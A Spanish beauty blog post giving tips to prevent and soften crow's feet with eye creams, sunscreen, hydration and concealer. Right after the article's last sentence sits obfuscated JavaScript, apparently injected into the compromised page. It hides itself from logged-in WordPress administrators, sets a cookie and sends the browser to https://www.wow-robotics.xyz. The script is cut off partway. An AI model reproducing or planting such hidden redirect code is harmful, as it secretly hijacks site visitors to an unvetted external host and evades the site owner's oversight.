Las patas de gallo son unos de los problemas más comunes que se muestran en las mujeres una vez que comienzan a cumplir años. Son muy antiestéticas, ya que muestran un rostro envejecido y con pérdida de elasticidad. Son unas arrugas muy finas que aparecen a ambos lados de los ojos en sentido horizontal.

Los siguientes tips te ayudarán a prevenirlas:

  1. Procura cuidar tu piel desde que eres joven, utilizando siempre un contorno de ojos y llevando una alimentación sana.
  2. Bebe abundante agua al día, pero evita el alcohol, ya que todos sabemos que el alcohol provoca que la piel envejezca antes.
  3. Evita las largas exposiciones al sol, sobretodo en las horas donde los rayos del sol inciden con más fuera, entre las 12.00h y las 16.00h.
  4. Protege siempre la piel de tu rostro. Usa a diario un contorno de ojos anti-arrugas y una crema con un alto factor de protección solar. Así, además de hidratar, conseguirás proteger tu rostro de las altas temperaturas y las exposiciones al sol prolongadas.
  5. Evita el exceso de tabaco y el contacto directo del humo en tus ojos, ya que conseguirás irritarlos y envejecerán más rápidamente.

Y si las patas de gallo ya se han instalado en tu rostro, los siguientes pasos te pueden ayudar a combatirlas:

Si comienzas a observar que las patas de gallo se acentúan y marcan con más intensidad. Hidrata y fortalece la zona más delicada de tu rostro.

  1. En primer lugar, mantén esa zona perfectamente hidratada, utilizando un contorno de ojos día y noche.
  2. Aplica factor de protección solar debajo del maquillaje o, en su defecto, usa una base de maquillaje o unos polvos compactos con un SPF muy alto.
  3. Utiliza correctores alrededor de los ojos. Procura usar un producto mate y untuoso, que consiga tapar a la perfección esas antiestéticas líneas de expresión. No apliques exceso de producto, pues si no conseguirás el efecto contrario, que tus arrugas se noten más.
  4. Aplica productos que estimulen la producción de colágeno, como el ácido hialurónico.

En fin, con estos consejos, no deberás preocuparte por el aspecto del contorno de los ojos, pero no olvides que debes ser constante y realizar estos pasos diariamente. Di adiós a las patas de gallo y ¡presume de rostro joven! var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone